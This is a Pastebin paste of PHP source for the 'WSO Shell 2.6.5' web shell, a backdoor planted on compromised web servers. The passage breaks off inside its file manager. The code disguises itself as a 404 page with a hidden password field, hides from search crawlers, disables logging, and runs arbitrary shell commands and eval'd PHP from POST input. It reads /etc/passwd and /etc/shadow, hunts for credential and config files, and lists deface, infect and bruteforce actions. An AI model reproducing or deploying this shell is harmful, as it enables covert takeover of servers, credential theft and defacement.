SHARE
TWEET

WSO Shell 2.6.5

ToKeiChun Nov 21st, 2017 1,279 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $auth_pass = "";
  3. $color = "#00ff00";
  4. $sec = 1;
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7.  
  8.  
  9. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  10.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "facebook","yahoo");
  11.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  12.         header('HTTP/1.0 404 Not Found');
  13.         exit;
  14.     }  
  15. }
  16. @session_start();
  17. @error_reporting(0);
  18. @ini_set('error_log',NULL);
  19. @ini_set('log_errors',0);
  20. @ini_set('max_execution_time',0);
  21. @set_time_limit(0);
  22. @set_magic_quotes_runtime(0);
  23. @define('VERSION' , '2.6.5 by Drac-101code');
  24. if( get_magic_quotes_gpc() ) {
  25.     function stripslashes_array($array) {
  26.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  27.     }
  28.     $_POST = stripslashes_array($_POST);
  29. }
  30. function printLogin() {
  31.     ?>
  32. <h1>Not Found</h1>
  33. <p>The requested URL was not found on this server.</p>
  34. <hr>
  35. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  36.     <style>
  37.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  38.     </style>
  39.     <center>
  40.     <form method=post>
  41.     <input type=password name=pass>
  42.     </form></center>
  43.     <?php
  44.     exit;
  45. }
  46. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
  47.     if( empty( $auth_pass ) ||
  48.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  49.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  50.     else
  51.         printLogin();
  52.  
  53. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  54.     $os = 'win';
  55. else
  56.     $os = 'nix';
  57. $safe_mode = @ini_get('safe_mode');
  58. $disable_functions = @ini_get('disable_functions');
  59. $home_cwd = @getcwd();
  60. if( isset( $_POST['c'] ) )
  61.     @chdir($_POST['c']);
  62. $cwd = @getcwd();
  63. if( $os == 'win') {
  64.     $home_cwd = str_replace("\\", "/", $home_cwd);
  65.     $cwd = str_replace("\\", "/", $cwd);
  66. }
  67. if( $cwd[strlen($cwd)-1] != '/' )
  68.     $cwd .= '/';
  69.    
  70. if($os == 'win')
  71.     $aliases = array(
  72.         "List Directory" => "dir",
  73.         "Find index.php in current dir" => "dir /s /w /b index.php",
  74.         "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  75.         "Show active connections" => "netstat -an",
  76.         "Show running services" => "net start",
  77.         "User accounts" => "net user",
  78.         "Show computers" => "net view",
  79.         "ARP Table" => "arp -a",
  80.         "IP Configuration" => "ipconfig /all"
  81.     );
  82. else
  83.     $aliases = array(
  84.         "List dir" => "ls -la",
  85.         "list file attributes on a Linux second extended file system" => "lsattr -va",
  86.         "show opened ports" => "netstat -an | grep -i listen",
  87.         "Find" => "",
  88.         "find all suid files" => "find / -type f -perm -04000 -ls",
  89.         "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  90.         "find all sgid files" => "find / -type f -perm -02000 -ls",
  91.         "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  92.         "find config.inc.php files" => "find / -type f -name config.inc.php",
  93.         "find config* files" => "find / -type f -name \"config*\"",
  94.         "find config* files in current dir" => "find . -type f -name \"config*\"",
  95.         "find all writable folders and files" => "find / -perm -2 -ls",
  96.         "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  97.         "find all service.pwd files" => "find / -type f -name service.pwd",
  98.         "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  99.         "find all .htpasswd files" => "find / -type f -name .htpasswd",
  100.         "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  101.         "find all .bash_history files" => "find / -type f -name .bash_history",
  102.         "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  103.         "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  104.         "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  105.         "Locate" => "",
  106.         "locate httpd.conf files" => "locate httpd.conf",
  107.         "locate vhosts.conf files" => "locate vhosts.conf",
  108.         "locate proftpd.conf files" => "locate proftpd.conf",
  109.         "locate psybnc.conf files" => "locate psybnc.conf",
  110.         "locate my.conf files" => "locate my.conf",
  111.         "locate admin.php files" =>"locate admin.php",
  112.         "locate cfg.php files" => "locate cfg.php",
  113.         "locate conf.php files" => "locate conf.php",
  114.         "locate config.dat files" => "locate config.dat",
  115.         "locate config.php files" => "locate config.php",
  116.         "locate config.inc files" => "locate config.inc",
  117.         "locate config.inc.php" => "locate config.inc.php",
  118.         "locate config.default.php files" => "locate config.default.php",
  119.         "locate config* files " => "locate config",
  120.         "locate .conf files"=>"locate '.conf'",
  121.         "locate .pwd files" => "locate '.pwd'",
  122.         "locate .sql files" => "locate '.sql'",
  123.         "locate .htpasswd files" => "locate '.htpasswd'",
  124.         "locate .bash_history files" => "locate '.bash_history'",
  125.         "locate .mysql_history files" => "locate '.mysql_history'",
  126.         "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  127.         "locate backup files" => "locate backup",
  128.         "locate dump files" => "locate dump",
  129.         "locate priv files" => "locate priv"   
  130.     );
  131.  
  132. function printHeader() {
  133.     if(empty($_POST['charset']))
  134.         $_POST['charset'] = "UTF-8";
  135.     global $color;
  136.     ?>
  137. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found<?=VERSION?></title>
  138. <style>
  139.     body {background-color:#000;color:#fff;}
  140.     body,td,th  { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  141.     span,h1,a   { color:<?=$color?> !important; }
  142.     span        { font-weight: bolder; }
  143.     h1          { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
  144.     div.content { padding: 5px;margin-left:5px;}
  145.     a           { text-decoration:none; }
  146.     a:hover     { background:#ff0000; }
  147.     .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  148.     .bigarea    { width:100%;height:250px; }
  149.     input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
  150.     form        { margin:0px; }
  151.     #toolsTbl   { text-align:center; }
  152.     .toolsInp   { width: 80%; }
  153.     .main th    {text-align:left;}
  154.     .main tr:hover{background-color:#5e5e5e;}
  155.     .main td, th{vertical-align:middle;}
  156.     pre         {font-family:Courier,Monospace;}
  157.     #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  158. </style>
  159. <script>
  160.     function set(a,c,p1,p2,p3,p4,charset) {
  161.         if(a != null)document.mf.a.value=a;
  162.         if(c != null)document.mf.c.value=c;
  163.         if(p1 != null)document.mf.p1.value=p1;
  164.         if(p2 != null)document.mf.p2.value=p2;
  165.         if(p3 != null)document.mf.p3.value=p3;
  166.         if(p4 != null)document.mf.p4.value=p4;
  167.         if(charset != null)document.mf.charset.value=charset;
  168.     }
  169.     function g(a,c,p1,p2,p3,charset) {
  170.         set(a,c,p1,p2,p3,charset);
  171.         document.mf.submit();
  172.     }
  173.     function da2(a,c,p1,p2,p3,p4,charset) {
  174.         set(a,c,p1,p2,p3,p4,charset);
  175.         document.mf.submit();
  176.     }
  177.     function a(a,c,p1,p2,p3,charset) {
  178.         set(a,c,p1,p2,p3,charset);
  179.         var params = "ajax=true";
  180.         for(i=0;i<document.mf.elements.length;i++)
  181.             params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  182.         sr('<?=$_SERVER['REQUEST_URI'];?>', params);
  183.     }
  184.     function sr(url, params) { 
  185.         if (window.XMLHttpRequest) {
  186.             req = new XMLHttpRequest();
  187.             req.onreadystatechange = processReqChange;
  188.             req.open("POST", url, true);
  189.             req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  190.             req.send(params);
  191.         }
  192.         else if (window.ActiveXObject) {
  193.             req = new ActiveXObject("Microsoft.XMLHTTP");
  194.             if (req) {
  195.                 req.onreadystatechange = processReqChange;
  196.                 req.open("POST", url, true);
  197.                 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  198.                 req.send(params);
  199.             }
  200.         }
  201.     }
  202.     function processReqChange() {
  203.         if( (req.readyState == 4) )
  204.             if(req.status == 200) {
  205.  
  206.                 //alert(req.responseText);
  207.                 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  208.                 var arr=reg.exec(req.responseText);
  209.                 eval(arr[2].substr(0, arr[1]));
  210.             }
  211.             else alert("Request error!");
  212.     }
  213. </script>
  214. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
  215. <form method=post name=mf style='display:none;'>
  216. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
  217. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  218. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
  219. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
  220. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
  221. <input type=hidden name=p4 value='<?=isset($_POST['p4'])?htmlspecialchars($_POST['p4']):''?>'>
  222. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  223. </form>
  224. <?php
  225.     $freeSpace = @diskfreespace($GLOBALS['cwd']);
  226.     $totalSpace = @disk_total_space($GLOBALS['cwd']);
  227.     $totalSpace = $totalSpace?$totalSpace:1;
  228.     $release = @php_uname('r');
  229.     $kernel = @php_uname('s');
  230.     $millink='http://www.exploit-db.com/search/?action=search&filter_description=';
  231.     // fixme
  232.     $millink2='http://www.1337day.com/search';
  233.    
  234.     if( strpos('Linux', $kernel) !== false )
  235.         $millink .= urlencode( '' . substr($release,0,6) );
  236.     else
  237.         $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
  238.     if(!function_exists('posix_getegid')) {
  239.         $user = @get_current_user();
  240.         $uid = @getmyuid();
  241.         $gid = @getmygid();
  242.         $group = "?";
  243.     } else {
  244.         $uid = @posix_getpwuid(@posix_geteuid());
  245.         $gid = @posix_getgrgid(@posix_getegid());
  246.         $user = $uid['name'];
  247.         $uid = $uid['uid'];
  248.         $group = $gid['name'];
  249.         $gid = $gid['gid'];
  250.     }
  251.    
  252.     $cwd_links = '';
  253.     $path = explode("/", $GLOBALS['cwd']);
  254.     $n=count($path);
  255.     for($i=0;$i<$n-1;$i++) {
  256.         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  257.         for($j=0;$j<=$i;$j++)
  258.             $cwd_links .= $path[$j].'/';
  259.         $cwd_links .= "\")'>".$path[$i]."/</a>";
  260.     }
  261.     $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  262.     $opt_charsets = '';
  263.     foreach($charsets as $item)
  264.         $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  265.     $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Infect'=>'Infect','Readable'=>'Readable','Test'=>'Test','CgiShell'=>'CgiShell','Symlink'=>'Symlink','Deface'=>'Deface', 'Domain'=>'Domain','ZHposter'=>'ZHposter');
  266.    
  267.     if(!empty($GLOBALS['auth_pass']))
  268.     $m['Logout'] = 'Logout';
  269.     $m['Self remove'] = 'SelfRemove';
  270.     $menu = '';
  271.     foreach($m as $k => $v)
  272.         $menu .= '<th width="'.(int)(1/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
  273.     $drives = "";
  274.     if ($GLOBALS['os'] == 'win') {
  275.         foreach( range('a','z') as $drive )
  276.         if (is_dir($drive.':\\'))
  277.             $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  278.     }
  279.     echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
  280.          '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[exploit-db]</a> <a href="'.$millink2.'" target=_blank>[1337day]</a>
  281.                    Download : <a href="http://www.google.com" target=_blank>[SideKick1]</a>
  282. <a href="http://www.google.com" target=_blank>[SideKick2]</a>
  283. </nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' ) <span>Usefull Locals:</span> '.rootxpL().' <br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
  284.          '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
  285.          '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
  286. }
  287.  
  288. function printFooter() {
  289.     $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  290. ?>
  291. </div>
  292. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
  293.     <tr>
  294.         <td><form onSubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
  295.         <td><form onSubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  296.     </tr>
  297.     <tr>
  298.         <td><form onSubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
  299.         <td><form onSubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  300.     </tr>
  301.     <tr>
  302.         <td><form onSubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  303.         <td><form method='post' ENCTYPE='multipart/form-data'>
  304.         <input type=hidden name=a value='FilesMAn'>
  305.         <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  306.         <input type=hidden name=p1 value='uploadFile'>
  307.         <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  308.         <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
  309.     </tr>
  310.  
  311. </table>
  312. </div>
  313. </body></html>
  314. <?php
  315. }
  316. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  317. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  318. function ex($in) {
  319.     $out = '';
  320.     if(function_exists('exec')) {
  321.         @exec($in,$out);
  322.         $out = @join("\n",$out);
  323.     }elseif(function_exists('passthru')) {
  324.         ob_start();
  325.         @passthru($in);
  326.         $out = ob_get_clean();
  327.     }elseif(function_exists('system')) {
  328.         ob_start();
  329.         @system($in);
  330.         $out = ob_get_clean();
  331.     }elseif(function_exists('shell_exec')) {
  332.         $out = shell_exec($in);
  333.     }elseif(is_resource($f = @popen($in,"r"))) {
  334.         $out = "";
  335.         while(!@feof($f))
  336.             $out .= fread($f,1024);
  337.         pclose($f);
  338.     }
  339.     return $out;
  340. }
  341. function viewSize($s) {
  342.     if($s >= 1073741824)
  343.         return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  344.     elseif($s >= 1048576)
  345.         return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  346.     elseif($s >= 1024)
  347.         return sprintf('%1.2f', $s / 1024 ) . ' KB';
  348.     else
  349.         return $s . ' B';
  350. }
  351.  
  352. function perms($p) {
  353.     if (($p & 0xC000) == 0xC000)$i = 's';
  354.     elseif (($p & 0xA000) == 0xA000)$i = 'l';
  355.     elseif (($p & 0x8000) == 0x8000)$i = '-';
  356.     elseif (($p & 0x6000) == 0x6000)$i = 'b';
  357.     elseif (($p & 0x4000) == 0x4000)$i = 'd';
  358.     elseif (($p & 0x2000) == 0x2000)$i = 'c';
  359.     elseif (($p & 0x1000) == 0x1000)$i = 'p';
  360.     else $i = 'u';
  361.     $i .= (($p & 0x0100) ? 'r' : '-');
  362.     $i .= (($p & 0x0080) ? 'w' : '-');
  363.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  364.     $i .= (($p & 0x0020) ? 'r' : '-');
  365.     $i .= (($p & 0x0010) ? 'w' : '-');
  366.     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  367.     $i .= (($p & 0x0004) ? 'r' : '-');
  368.     $i .= (($p & 0x0002) ? 'w' : '-');
  369.     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  370.     return $i;
  371. }
  372. function viewPermsColor($f) {
  373.     if (!@is_readable($f))
  374.         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  375.     elseif (!@is_writable($f))
  376.         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  377.     else
  378.         return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
  379. }
  380. if(!function_exists("scandir")) {
  381.     function scandir($dir) {
  382.         $dh  = opendir($dir);
  383.         while (false !== ($filename = readdir($dh))) {
  384.             $files[] = $filename;
  385.         }
  386.         return $files;
  387.     }
  388. }
  389. function which($p) {
  390.     $path = ex('which '.$p);
  391.     if(!empty($path))
  392.         return $path;
  393.     return false;
  394. }
  395. function actionSecInfo() {
  396.     printHeader();
  397.     echo '<h1>Server security information</h1><div class=content>';
  398.     function showSecParam($n, $v) {
  399.         $v = trim($v);
  400.         if($v) {
  401.             echo '<span>'.$n.': </span>';
  402.             if(strpos($v, "\n") === false)
  403.                 echo $v.'<br>';
  404.             else
  405.                 echo '<pre class=ml1>'.$v.'</pre>';
  406.         }
  407.     }
  408.    
  409.     showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  410.     if(function_exists('apache_get_modules'))
  411.         showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  412.     showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  413.     showSecParam('Open base dir', @ini_get('open_basedir'));
  414.     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  415.     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  416.     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  417.     $temp=array();
  418.     if(function_exists('mysql_get_client_info'))
  419.         $temp[] = "MySql (".mysql_get_client_info().")";
  420.     if(function_exists('mssql_connect'))
  421.         $temp[] = "MSSQL";
  422.     if(function_exists('pg_connect'))
  423.         $temp[] = "PostgreSQL";
  424.     if(function_exists('oci_connect'))
  425.         $temp[] = "Oracle";
  426.     showSecParam('Supported databases', implode(', ', $temp));
  427.     echo '<br>';
  428.    
  429.     if( $GLOBALS['os'] == 'nix' ) {
  430.         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  431.         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  432.         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  433.         showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  434.         showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  435.         showSecParam('OS version', @file_get_contents('/proc/version'));
  436.         showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  437.         if(!$GLOBALS['safe_mode']) {
  438.             echo '<br>';
  439.             $temp=array();
  440.             foreach ($userful as $item)
  441.                 if(which($item)){$temp[]=$item;}
  442.             showSecParam('Userful', implode(', ',$temp));
  443.             $temp=array();
  444.             foreach ($danger as $item)
  445.                 if(which($item)){$temp[]=$item;}
  446.             showSecParam('Danger', implode(', ',$temp));
  447.             $temp=array();
  448.             foreach ($downloaders as $item)
  449.                 if(which($item)){$temp[]=$item;}
  450.             showSecParam('Downloaders', implode(', ',$temp));
  451.             echo '<br/>';
  452.             showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  453.             showSecParam('HDD space', ex('df -h'));
  454.             showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  455.         }
  456.     } else {
  457.         showSecParam('OS Version',ex('ver'));
  458.         showSecParam('Account Settings',ex('net accounts'));
  459.         showSecParam('User Accounts',ex('net user'));
  460.     }
  461.     echo '</div>';
  462.     printFooter();
  463. }
  464.  
  465. function actionPhp() {
  466.     if( isset($_POST['ajax']) ) {
  467.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  468.         ob_start();
  469.         eval($_POST['p1']);
  470.         $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  471.         echo strlen($temp), "\n", $temp;
  472.         exit;
  473.     }
  474.     printHeader();
  475.     if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  476.         echo '<h1>PHP info</h1><div class=content>';
  477.         ob_start();
  478.         phpinfo();
  479.         $tmp = ob_get_clean();
  480.         $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  481.         $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  482.         $tmp = preg_replace('!h1!msiU','h2',$tmp);
  483.         $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  484.         $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  485.         echo $tmp;
  486.         echo '</div><br>';
  487.     }
  488.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  489.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  490.         echo '<h1>Execution PHP-code</h1> example : echo file_get_contents(`/etc/passwd`); <div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  491.     echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  492.     if(!empty($_POST['p1'])) {
  493.         ob_start();
  494.         eval($_POST['p1']);
  495.         echo htmlspecialchars(ob_get_clean());
  496.     }
  497.     echo '</pre></div>';
  498.     printFooter();
  499. }
  500.  
  501. function actionFilesMan() {
  502.     printHeader();
  503.     echo '<h1>File manager</h1><div class=content>';
  504.     if(isset($_POST['p1'])) {
  505.         switch($_POST['p1']) {
  506.             case 'uploadFile':
  507.                 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  508.                     echo "Can't upload file!";
  509.                 break;
  510.                 break;
  511.             case 'mkdir':
  512.                 if(!@mkdir($_POST['p2']))
  513.                     echo "Can't create new dir";
  514.                 break;
  515.             case 'delete':
  516.                 function deleteDir($path) {
  517.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  518.                     $dh  = opendir($path);
  519.                     while ( ($item = readdir($dh) ) !== false) {
  520.                         $item = $path.$item;
  521.                         if ( (basename($item) == "..") || (basename($item) == ".") )
  522.                             continue;
  523.                         $type = filetype($item);
  524.                         if ($type == "dir")
  525.                             deleteDir($item);
  526.                         else
  527.                             @unlink($item);
  528.                     }
  529.                     closedir($dh);
  530.                     rmdir($path);
  531.                 }
  532.                 if(is_array(@$_POST['f']))
  533.                     foreach($_POST['f'] as $f) {
  534.                         $f = urldecode($f);
  535.                         if(is_dir($f))
  536.                             deleteDir($f);
  537.                         else
  538.                             @unlink($f);
  539.                     }
  540.                 break;
  541.             case 'paste':
  542.                 if($_SESSION['act'] == 'copy') {
  543.                     function copy_paste($c,$s,$d){
  544.                         if(is_dir($c.$s)){
  545.                             mkdir($d.$s);
  546.                             $h = opendir($c.$s);
  547.                             while (($f = readdir($h)) !== false)
  548.                                 if (($f != ".") and ($f != "..")) {
  549.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  550.                                 }
  551.                         } elseif(is_file($c.$s)) {
  552.                             @copy($c.$s, $d.$s);
  553.                         }
  554.                     }
  555.                     foreach($_SESSION['f'] as $f)
  556.                         copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                  
  557.                 } elseif($_SESSION['act'] == 'move') {
  558.                     function move_paste($c,$s,$d){
  559.                         if(is_dir($c.$s)){
  560.                             mkdir($d.$s);
  561.                             $h = opendir($c.$s);
  562.                             while (($f = readdir($h)) !== false)
  563.                                 if (($f != ".") and ($f != "..")) {
  564.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  565.                                 }
  566.                         } elseif(is_file($c.$s)) {
  567.                             @copy($c.$s, $d.$s);
  568.                         }
  569.                     }
  570.                     foreach($_SESSION['f'] as $f)
  571.                         @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  572.                 }
  573.                 unset($_SESSION['f']);
  574.                 break;
  575.             default:
  576.                 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  577.                     $_SESSION['act'] = @$_POST['p1'];
  578.                     $_SESSION['f'] = @$_POST['f'];
  579.                     foreach($_SESSION['f'] as $k => $f)
  580.                         $_SESSION['f'][$k] = urldecode($f);
  581.                     $_SESSION['cwd'] = @$_POST['c'];
  582.                 }
  583.                 break;
  584.         }
  585.         echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  586.     }
  587.     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  588.     if($dirContent === false) { echo 'Can\'t open this folder!'; return;    }
  589.     global $sort;
  590.     $sort = array('name', 1);
  591.     if(!empty($_POST['p1'])) {
  592.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  593.             $sort = array($match[1], (int)$match[2]);
  594.     }
  595. ?>
  596. <script>
  597.     function sa() {
  598.         for(i=0;i<document.files.elements.length;i++)
  599.             if(document.files.elements[i].type == 'checkbox')
  600.                 document.files.elements[i].checked = document.files.elements[0].checked;
  601.     }
  602. </script>
  603. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
  604. <form name=files method=post>
  605. <?php
  606.     echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  607.     $dirs = $files = $links = array();
  608.     $n = count($dirContent);
  609.     for($i=0;$i<$n;$i++) {
  610.         $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
